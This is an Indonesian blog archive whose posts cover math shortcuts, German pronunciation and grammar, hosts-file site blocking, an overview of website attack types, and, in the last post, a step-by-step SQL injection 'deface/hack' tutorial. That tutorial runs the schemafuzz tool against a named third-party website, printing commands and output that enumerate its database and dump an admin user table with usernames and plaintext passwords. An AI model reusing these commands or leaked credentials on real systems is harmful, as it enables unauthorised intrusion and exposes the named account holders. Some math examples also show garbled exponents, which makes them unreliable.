Sabtu, 12 Mei 2012

Mudahnya Hitung soal Matematika

Trik hitung soal matematika – Belajar Matematika sangat mengasyikkan jika kita tahu cara penyelesaiannya. Persoalan matematika biasanya dikerjakan dengan cara-cara yang pasti/baku, atau dengan trik-trik yang dapat mempermudah perhitungan pada umumnya. Bila Anda ingin makin mahir dalam bidang Matematika, hendaknya sering melatih diri dengan menyelesaikan persoalan Matematika sebanyak mungkin.

Di bawah ini ada beberapa tips dan trik penyelesaian soal matematika dengan cepat, antara lain :

1. Soal Matematika, Pengkuadratan Angka Berakhiran Lima
langkah-langkahnya :
a) Kalikan angka sebelum angka lima dengan angka urutan selanjutnya.
b) Tuliskan angka 25 di belakang angka hasil dari a)
contoh :
i. 652 = ?
a) 6 x 7 = 42
b) hasil : 4225
ii. 1052 = ?
a) 10 x 11 = 110
b) hasil : 11025
2. Soal matematika, Pengkuadratan Dua Angka Bilangan yang dimulai dengan Lima
langkah-langkahnya :
a) Tambahkan bilangan 25 dengan bilangan satuannya.
b) Kuadratkan bilangan satuannya.
(khusus untuk angka satuan 1, 2, dan 3, hasil kuadratnya dituliskan 01, 04, dan
09)
c) Hasil akhir adalah gabungan a) dan b)
contoh :
i. 512 = ?
a) 25 + 1 = 26
b) 12 = 01
c) hasil : 2601
ii. 592 = ?
a) 25 + 9 = 34
b) 92 = 81
c) hasil : 3481
3. Soal matematika, Pengkuadratan Dua Angka Bilangan yang diakhiri angka Satu
langkah-langkahnya :
a) Kuadratkan angka bulatnya.
b) Jumlahkan angka tersebut dengan angka bulatnya.
c) Hasil akhirnya adalah jumlah dari a) dan b)
contoh :
i. 612 = ?
a) 602 = 3600
b) 61 + 60 = 121
c) hasil : 3600 + 121 =3721
ii. 212 = ?
a) 202 = 400
b) 21 + 20 = 41
c) hasil : 400 + 41 = 441
4. Soal matematika, Perkalian Satu Angka dengan 11 (11; 110; 1,1 dan seterusnya)
langkah-langkahnya :
a) Tuliskan angkanya.
b) Sisipkan angka dari jumlah dua angka tersebut. Hati-hati bila hasil penjumlahannya lebih dari 9, angka puluhannya dijumlahkan dengan angka pertama.
contoh :
i. 24 x 11 = ?
a) 2 ? 4
b) 2 + 4 = 6 –>> Hasilnya : 264
ii. 67 x 11 = ?
a) 6 ? 7
b) 6 + 7 = 13 –>> 6 + 1 = 7 –>> Hasilnya : 737
5. Soal matematika, Perkalian Satu Angka atau Dua Angka dengan 99 (0,99; 9,9; 990 dst.)
langkah-langkahnya :
a) Kurangi bilangan tersebut dengan angka 1.
b) Kurangi bilangan 100 dengan bilangan tersebut.
c) Hasil akhirnya adalah gabungan dari a) dan b)
contoh :
15 x 99 = ?
a) 15 – 1 = 14
b) 100 – 15 = 85
c) hasilnya : 1485
6. Soal matematika, Perkalian Bilangan Genap dengan 1,5; 2,5; 3,5 dst.
langkah-langkahnya :
a) Kalikan bilangan pengali dengan 2.
b) Bilangan yang dikalikan dibagi dengan angka 2.
c) Hasil akhirnya adalah perkalian a) dan b)
contoh :
16 x 4,5 = ?
a) 4,5 x 2 = 9
b) 16 : 2 = 8
c) hasilnya : 9 x 8 = 72
7. Soal matematika, Perkalian Satu atau Dua Angka dengan 101 (1,01; 10,1 dst)
langkah-langkahnya :
a) Tuliskan angkanya dua kali.
b) Sisipkan nol atau koma.
contoh :
i. 27 x 101 = ?
a) 2727
ii. 4 x 101 = ?
a) 44
b) hasilnya : 404
8. Soal matematika, Perkalian Dua Bilangan yang Nilainya Berselisih Dua
langkah-langkahnya :
a) Kuadratkan bilangan di antaranya.
b) Hasilnya : a) -1.
contoh :
i. 11 x 13 = ?
a) 122 = 144
b) Hasilnya : 144 – 1 = 143

Semoga artikel mengenai Tips dan Trik Hitung soal matematika ini bermanfaat bagi Anda.

»»  READMORE...

Cara Membaca Tulisan Bahasa Jerman

Belajar Membaca Tulisan Bahasa Jerman

Halo semuanya, berjumpa lagi ya, setelah lama blog ini vacum. Kali ini saya akan berbagi dengan anda semuanya, yaitu informasi tentang Cara Membaca Tulisan Bahasa Jerman, pasti ini sangat bermanfaat bagi Anda, oke kalau begitu berikut pemaparannya.
Dalam pembelajaran bahasa khususnya bahasa Jerman, terdapat empat keterampilan yang harus dikuasai oleh seseorang pembelajar Bahasa Jerman. Keempat keterampilan itu adalah, keterampilan membaca (Lesefertigkeit), berbicara (Sprechfertigkeit), menyimak (Hörfertigkeit), dan menulis (Schreibfertigkeit).

Tidak begitu sulit Membaca Tulisan Bahasa Jerman

Sebagian besar kata atau kalimat bahasa Jerman dibaca sesuai dengan apa yang tertera pada tulisannya. Untuk lebih jelasnya penulis akan menerangkan dan memberikan contoh cara membaca tulisan bahasa Jerman.
Huruf abjad dalam bahasa Jerman
Aa Be Ce De Ee eF Ge Ha Ii Jot Ka eL eM eN Oo Pe Qu eR eS Te Uu Vau We iX Ypsilon Zet Ääa-umlaut Üüu-umlaut Öőo-umlaut βEsZet
Belajar Membaca Tulisan Bahasa Jerman – Tidak jauh berbeda dengan bahasa Indonesia. Hanya yang berhuruf tebal saja yang berbeda. Itu pun berbeda pengucapan hurufnya, tapi bila sudah ada di dalam kata, bunyinya akan sama dengan bahasa Indonesia
Membaca Tulisan Bahasa Jerman
Contoh:
Qualität – dibaca: kualitet
variabel – dibaca: fariabel
Januar – dibaca: Yanuar
Wolf – dibaca: Volf
Zebra – dibaca: Tsebra
Typ – dibaca: tüp (ü lihat penjelasan di bawah)
Tapi ada tambahan huruf lagi dalam bahasa Jerman, yaitu umlaut:
ä (a umlaut), biasa juga ditulis dengan ae
ö (o umlaut), biasa juga ditulis dengan oe
ü (u umlaut), biasa juga ditulis dengan ue
Nah ini yang susah. Susah untuk menuliskan bagaimana ketiga huruf umlaut itu dibaca. Harus mendengar dan melihat langsung. Tapi kira-kira begini:
ä – pengucapannya mirip dengan pengucapan e
ö – pengucapannya antara mengucapkan o dan u (mulutnya mancung ya…)
ü – pengucapannya antara mengucapkan u dan e (mulutnya mancung ya…)
Masih ada satu huruf lagi: ß (eszett). Ini cara membacanya gampang. Jangan panik dulu melihat bentuknya. Membacanya seperti membaca huruf s yang ‘tajam/tebal’ atau double s – ss.
Contoh: Grüßen dibaca: Gruessen.
Lalu ada lagi gabungan beberapa huruf yang sering dipakai dalam Bahasa Jerman:
äu – dibaca oi/oy
ch – dibaca kh tebal
ck – dibaca k
ei – dibaca ai
eu – dibaca oi/oy
ie – dibaca i panjang
sp, st – bila diawal kata dibaca dengan s seperti syin atau sh atau sy; bila ditengah dibaca tipis seperti biasa
sch – membacanya juga seperti s pada syin atau sh atau sy.
Masih ada lagi beberapa huruf yang sering ditulis berdekatan. Tapi cara membacanya biasa saja seperti bahasa Indonesia.
Misalnya: Pf dalam Pfau (merak) dibaca Pfau seperti biasa.
Kasus lain:
– pengucapan huruf h. Bila huruf h terdapat di tengah kata, maka h ‘tidak dibaca’, tapi membaca a nya agak panjang aa.
Contoh: Mahnung – dibaca Manung.
- pengucapan huruf s. Bila huruf s diikuti vokal, maka dibaca z.
Contoh: Sonne – dibaca Zonne
- -ig. Bila ig terletak di akhir kata, maka dibaca ih.
Contoh: billig – dibaca billih
Sebetulnya masih ada lagi, yaitu akhiran -en, pada kata kerja bentuk dasar bahasa Jerman. Akhiran -en, ini biasanya ***capkan tak jelas.
Misalnya: machen – dibaca: mach‘n
Demikian dasar-dasar cara membaca satuan terkecil kata dalam bahasa Jerman. Mudah-mudahan tidak ada yang tertinggal.
Satu catatan: Pada kenyataan sehari-hari kerap terdengar ketakpersisan cara membaca/mengucapkan dari orang-orang native Jerman sekalipun. Hal ini dikarenakan- seperti juga pada semua bahasa di dunia- ‘pengucapan bahasa’ atau pronounciation memang bukanlah ilmu pasti. Ia dipengaruhi oleh dialek, tempat/lokasi, dan juga tingkat pendidikan.
Sebagai penutup berikut ada beberapa contoh sekedar untuk melengkapi:
- Michael Schumacher – dibaca: Mikhael Shumakher
- Winter – dibaca: Vinter
- Vogel – dibaca: Fogel
- Läufer – dibaca: Loyfer
- meine – dibaca: maine
- Europa – dibaca: Oyropa
- zurück – dibaca: tsuruek
- Biene – dibaca: Biine

Semoga artikel mengenai Cara Membaca Tulisan Bahasa Jerman ini bermanfaat bagi Anda  :)

»»  READMORE...

Rabu, 02 Mei 2012

Bahasa Jerman: Kata Benda dan Artikel

Salah satu bagian yang terumit (baca menantang) dalam mempelajari Bahasa Jerman adalah penggunaan artikel yang mengikuti kata benda. Artikel merupakan indikator penting untuk menilai grammatik sebuah kalimat atau percakapan. Semua kata benda dalam Bahasa Jerman merupakan bagian dari salah satu gender apakah dia maskulin, feminin ataupun netral.Dalam bentuk nominative, kata benda yang bersifat maskulin akan diikuti oleh artikel der, feminin adalah die dan netral adalah das.

Kadang gender dari kata benda mengikuti gendernya secara biologis meskipun dalam sebagian kasus hal itu tidak berhubungan sama sekali. Kata Weib misalnya (yang berarti feminin atau perempuan) dianggap netral, das Weib. Jadi yang terbaik adalah selain menghafalkan artinya, anda harus menghafalkan pula artikelnya. Itu kabar buruknya. Kabar baiknya? Bahkan orang Jerman pun terkadang tidak tepat menyebutkan artikel sebuah kata benda.


Untuk kata yang mengikuti gendernya secara biologis adalah:
der Vater (ayah)

 die Mutter (ibu)
 der Sohn (anak laki2) 
die Tochter (anak perempuan) 
der Bruder (saudara laki2)
 die Schwester (saudara perempuan)
 die Tante (tante) 
der Onkel (paman)
 die Oma (nenek) 
der Opa (kakek)
 der Enkelsohn (cucu laki2)
 die Enkeltochter (cucu perempuan)
Nama nama hari dalam seminggu dan bulan dalam setahun semuanya adalah maskulin:


der Montag, der Dienstag, der Mittwoch, der Donnerstag, der Freitag, der Samstag, der Sonntag. (Berturut2 Senin sampai Minggu).
der Januar (dibaca Yanuar), der Februar, März (Merst), April, Mai, Juni (yuni), Juli (yuli),August, September, Oktober, November, Dezember (detsember).


Untuk profesi yang berakhiran er dan profesi oleh laki laki lainnya, cukup ditambahkan in untuk merubahnya menjadi feminin.


der Lehrer (guru laki2) menjadi die Lehrerin (guru perempuan).der Schneider (synaider, penjahit lelaki) menjadi die Schneiderin.der Anwalt (pengacara) menjadi die Anwaltin.


Kata benda yang berakhiran dengan schaft, heit, keit dan ung hampir pasti feminin:


die Freundschaft (froinsyaft, friendship)

 die Schönheit (syoenhait, beauty)
 die Wohnung (tempat tinggal)
 die Rechnung (invoice, tagihan) 
die Möglichkeit (kemungkinan)
 
Kuncinya adalah rajin membaca dan buka kamus bahasa jerman. Kesempatan lain adalah banyak berinteraksi (mempraktekkan) dengan orang yang bisa berbahasa Jerman, i.e. lewat chatting, mail2an ataupun berbicara langsung.


Gender dan artikel sangat penting posisinya dalam kalimat bahasa jerman karena pada tahap berikutnya dibutuhkan untuk pemakaian akkusative, dative dan genitive.


Ingat, ada beberapa kata dalam bahasa Jerman yang jika lain artikelnya lain pula maknanya. der See berarti danau sementara die See adalah laut/lautan.der Golf (teluk) dan die Golf (olahraga golf)der Junge (untuk boy) sementara das Junge (young animal).der Leiter (pimpinan) sementara die Leiter (tangga).
»»  READMORE...

Sabtu, 28 April 2012

Kumpulan Rumus Microsoft Excel

Sekilas Tentang Microsoft Excel
Microsoft Excel adalah sebuah program aplikasi lembar kerja spreadsheet yang dibuat dan didistribusikan oleh Microsoft Corporation untuk sistem operasi Microsoft Windows dan Mac OS. Aplikasi ini memiliki fitur kalkulasi dan pembuatan grafik yang, dengan menggunakan strategi marketing Microsoft yang agresif, menjadikan Microsoft Excel sebagai salah satu program komputer yang populer digunakan di dalam komputer mikro hingga saat ini.
Kumpulan Rumus Microsoft Excel
Kali ini saya akan sharing kumpulan rumus-rumus Microsoft Excel beserta contoh yang tentunya sangat cocok untuk yang sedang mempelajarinya. Oke langsung saja klik disini ~ !!
 Sekian....
Semoga Berguna........
»»  READMORE...

Rabu, 18 April 2012

Cara Memblokir Situs Tanpa Software

Baik saya akan menjelaskan tentang bagaimana cara memblokir situs yang tidak di inginkan kita agar tidak di buka orang lain
  • Klik kanan pada Start kemudian pilih explorer atau tekan Ctrl+E pada keyboard anda
  • Kemudian ketikan kode berikut pada addres "C:\WINDOWS\system32\drivers\etc"
  • Cari file hosts
 
  • Langkah selanjutnya buka file hosts yaitu dengan cara klik kanan kemudian pilih open with kemudian pilih dengan notepad kemudian OK
  • Kemudian tambahkan situs yang ingin anda blokir dengan cara menambahkan situs yang ingin di blokir setelah 127.0.0.1 localhost. Misalnya seperti situs dibawah ini:
          127.0.0.1    localhost
          127.0.0.2    www.facebook.com
          127.0.0.3    www.google.com
          127.0.0.4    www.youtube.com

  • Kemudian save notepad anda. 
  • Kemudian coba anda ke situ yang di block
»»  READMORE...

Cara Yang Dilakukan Hacker Untuk Menembus Website

Inilah Cara yang Dipakai Seorang Hacker Untuk Menembus Situs Atau Web-Cara cara seoarang hacker menembus ataupun menyusup dan juga merusak suatu website adalah sebagai berikut.Teknik teknik itu antara lain:
Inilah Cara Yang Dipakai Hacker Untuk Membobol Website:
1. IP Spoofing
2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks

1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.

IP Spoofing terjadi ketika seorang attacker “mengakali” packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.

2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.

3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efisien untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.

Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar “memberitahu” password dan kode akses terhadap system


4. Flooding & Broadcasting
Seorang attacker bisa mengurangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/ permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service (DoS), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang Menyediakan informasi menjadi lemah dan akhirnya menyerah.

Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama (header/ kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memproses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah (fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol

6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).

8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.

Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/ user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing


9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network


10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host Menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).

Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack
Protokol-protokol untuk tranportasi data (tulang punggung dari internet) adalah tingkat TCP (TCP Level) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.

12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.

13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.


15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.
»»  READMORE...

Minggu, 15 April 2012

Cara Deface/Hack Website dengan cara Schemafuzz

1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://rup.ee/schemafuzzy.py)
3.CMD

buka cmd masuk ke folder tempat schemafuzz.py berada...
ketikkan -> schemafuzz.py -u "url target" --perintah (list perintah ada di bawah)
1. masukkan target
saya contohkan target adalah ->
http://www.ditplb.or.id/profile.php?id=1

2.Masukkan perintah untuk mencari colom name
contoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1" --findcol
Maka keluar:


[+] URL: [url=http://www.ditplb.or.id/profile.php?id=1--]http://www.ditplb.or.id/profile.php?id=1--[/url]
[+]
Evasion Used: "+" "--"

[+] 20:36:29

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,
[+] Column Length is: 3

[+] Found null column at column #: 2

[+] SQLi URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... CT+0,1,2--

[+] darkc0de
URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... 1,darkc0de
[-] Done!











ternyata ada 2 kolom.
Berarti kita gunain http://www.ditplb.or.id/profile.php?id= ... 1,darkc0de untuk inject

3.Cari database dg command --dbs
contoh : schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dbs
Maka keluar:


Code:

[+] URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 2032

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb
User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0]   t15618_plb


[-] 2039

[-] Total URL Requests 3

[-] Done



disitu udah keliatan nama DBnya??? t15618_plb

4.Cari nama table dalam database
contoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --schema -D namadatabase
Jadinya: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --schema -D t15618_plb
Maka keluar:
Code:

[+] URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:43:10

[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keteran gan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done


Berarti web itu mempunyai 11 tabel.... n nama kolomnya juga udah ada..... tinggal pilih deh mana yang mau ditelanjangin...hhehehe (emg cewek ) :P

5.Melihat isi dari suatu tabel n kolom
contohl :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dump -D namadatabase -T namatable -C namakolom
Jadinya :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dump -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,Admin
Maka keluar:
Code:

[+] URL: [url=http://www.ditplb.or.id/profile.php?id=]http://www.ditplb.or.id/profile.php?id=[/url] ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:53:46

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Dumping data from database "t15618_plb" Table "user"

[+] and Column(s) ['ID_user', 'UserID', 'Password', 'Keterangan', 'Admin']

[+] Number of Rows: 13


[0] 1:direktur:direkturplbirektur PLB:Admin Direktur PLB:

[1] 2:yusuf:siplb:Achmad Yusuf:Admin Achmad Yusuf:

[2] 3:abdulmukti:fatmawatimukti: P. Abdul Mukti:Admin P. Abdul Mukti:

[3] 4:harryrogkal: ProgKAL:Admin ProgKAL:

[4] 5:samino:kurikulum:Kurikulum:Admin Kurikulum:

[5] 6:mugiarsih:manajemen:Manajemen:Admin Manajemen:

[6] 7:sutopo:kesiswaan:Kesiswaan:Admin Kesiswaan:

[7] 8:winarno:sarana:Sarana:Admin Sarana:

[8] 9:sanusi:tatausaha:Tata Usaha:Admin Tata Usaha:

[9] 10:sutji:evaluasi:Evaluasi:Admin Evaluasi:

[10] 11:thamrin:informatika:Informatika:Admin Informatika:

[11] 12:adjie:kerjasama:Kerjasama:Admin Kerjasama:

[12] 13:media:media:Media:Admin Media:

[13] No data

[-] 20:54:14

[-] Total URL Requests 15

[-] Done


Oops... kok user id n passwordnya gak di encrypt ya...........mungkin ini rejeki kita biar gak susah2 decryptnya

Cara diatas berlaku untuk sql versi 5 , untuk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolom
contoh:schemafuzz.py -U "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --fuzz

sekian tutor cupu ini moga bermanfaat. kalo ada yang kurang mohon di tambahin OK
»»  READMORE...